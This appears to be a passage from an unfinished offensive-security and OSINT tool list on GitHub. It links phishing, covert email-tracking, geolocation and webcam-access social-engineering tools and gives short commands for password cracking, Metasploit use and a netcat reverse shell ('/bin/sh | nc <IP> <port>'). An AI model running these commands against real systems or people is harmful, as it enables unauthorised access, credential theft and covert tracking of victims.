[https://github.com/samratashok/nishang/blob/master/Gather/Invoke-CredentialsPhish.ps1]


[Social fishing](https://socfishing.com)<br>
[Social media users identification](http://soceffect.ru)<br>
[Telephone number identification](https://dmp.one)<br>


**E-mail loggers:**<br>
[ReadNotify: get notification when letter was read](https://www.readnotify.com)<br>
[Get notify: E-mail tracker](https://www.getnotify.com)<br>
[DidTheyReadIt: invisibly tracked without alerting the recipient](http://www.didtheyreadit.com)<br>


**Geolocation tracker tools:**<br>
[Seeker: locate smartphones using social engineering](https://github.com/thewhiteh4t/seeker)<br>
[Trape: user tracker on the Internet: OSINT analysis and research tool](https://github.com/jofpin/trape)<br>
[TrackUrl: bash/JS script for tracking locations](https://github.com/cryptomarauder/TrackUrl)<br>
[R4ven: track the IP address and GPS location](https://github.com/spyboy-productions/r4ven)<br>
[IPlogger: location tracker](https://iplogger.org/location-tracker)<br>


**Bruteforce:**<br>
[Hydra](https://github.com/vanhauser-thc/thc-hydra)<br>
[Hashcat: advanced password recovery utility](https://github.com/hashcat/hashcat)<br>
**_Example:_**<br>
_Mask numbers will be appended to each word in the wordlist._<br>
`hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d`<br>
_Mask numbers will be prepended to each word in the wordlist._<br>
`hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt`<br>
[John the Ripper: advanced offline password cracker](https://github.com/openwall/john)<br>
**_Example:_**<br>
`john --wordlist=/usr/share/john/password.lst --rules unshadowed.txt`
[Aircrack-ng: WiFi security auditing tools suite](https://github.com/aircrack-ng/aircrack-ng)<br>
`sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre2-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils expect`<br>


[FCrackZIP: fast zip password cracker](https://github.com/foreni-packages/fcrackzip)<br>
**_Install:_**<br>
`sudo apt-get install fcrackzip`<br>
**_Example:_**<br>
`fcrackzip -u -D -p '<wordlist filename>' <filename>`<br>

[PDFCrack: advanced tool to crack password protected PDF file](https://github.com/machine1337/pdfcrack)<br>
**_Install:_**<br>
`apt-get install pdfcrack`<br>
**_Example:_**<br>
`pdfcrack <filename> -w <wordlist filename>`<br>
[QPDF: permanently decrypt the pdf](https://github.com/qpdf/qpdf)<br>
**_Install:_**<br>
`sudo apt-get install qpdf`<br>
**_Example:_**<br>
`qpdf --password=<PASSWORD> --decrypt <filename> encrypted.pdf plaintext.pdf`<br>


### <div align="left"> Command & control:</div>
**Reverse Shell (listeners)** is a type of attack in which an attacker establishes a connection from a victim’s system to the attacker’s system and then issues commands through a command-line interface or a shell.
`/bin/sh | nc <IP> <port>`
_Example_:
`/bin/sh | nc 127.0.0.1 5555`


[LinPEAS - Linux local privilege escalation awesome script (.sh)](https://github.com/carlospolop/PEASS-ng/tree/master)<br>
[Nighthawk: command-and-control framework](https://www.mdsec.co.uk/nighthawk)<br>
[Exploit database](https://www.exploit-db.com)<br>


[Storm breaker: social engineering tool (access webcam & microphone & location finder)](https://github.com/ultrasecurity/Storm-Breaker)<br>
**_Install:_**<br>
`git clone https://github.com/ultrasecurity/Storm-Breaker`<br>
`cd Storm-Breaker`<br>
`sudo bash install.sh`<br>
`sudo python3 -m pip install -r requirements.txt`<br>
`sudo python3 st.py`<br>


[BeEF: browser exploitation framework project](https://github.com/beefproject/beef)<br>
**_Install:_**<br>
`git clone https://github.com/beefproject/beef`<br>
`sudo apt-add-repository -y ppa:brightbox/ruby-ng`<br>
`cd beef`<br>
`./install`<br>
`./beef`<br>


### <div align="center"> Metasploit</div>

Metasploit:
- Exploit - exploit the system
- Auxiliary
- Post
- Payloader - implant
- Encoddrs
- Nods


**_Install:_**<br>
`curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall`<br>
`sudo msfdb init`<br>
**_Example:_**<br>
`msfconsole`<br>
`search <name of service>`<br>
`show options`<br>
`set RHOST <domain_name/IP>`<br>
`set RPORT <port>`<br>
`set payload <payload_name>`<br>
`run`<br>
_(Search Google for errors)_<br>



### <div align="center"> Recon-ng</div>

**_Install:_**<br>
`apt-get update && apt-get install recon-ng`<br>
**_Example:_**<br>
`git clone https://github.com/lanmaster53/recon-ng.git`<br>
`cd recon-ng`<br>
`pip install -r REQUIREMENTS`<br>
`./recon-ng`<br>
`marketplace install all`<br>
brute host<br>
reporting<br>





[Exegol: fully featured and community-driven hacking environment]()

Pivoting

https://leaksid.com/


> in progress..


<details>
  <summary><i>Tips&tricks:</i></summary>
  [Google Custom Search Engine](https://programmablesearchengine.google.com/intl/en_uk/about/)
</details>


<details>
  <summary><i>Resources to follow:</i></summary>
  [Awesome inteligence](https://github.com/ARPSyndicate/awesome-intelligence)<br>
  [Awesome OSINT](https://github.com/jivoi/awesome-osint)<br>
  [Bellingcat How To's:](https://www.bellingcat.com/resources/how-tos)<br>
  [Start me: tools](https://start.me/p/wMdQMQ/tools)<br>
  [Start me: jornadas](https://start.me/p/BnBb5v/jornadas-osint)<br>
  [OSINT for countries](https://github.com/wddadk/OSINT-for-countries)<br>
  [AML toolbox](https://start.me/p/rxeRqr/aml-toolbox)<br>
  ["Must Have" Free Open-Source Intelligence (OSINT) Resources](https://www.sans.org/blog/-must-have-free-resources-for-open-source-intelligence-osint-/)
</details>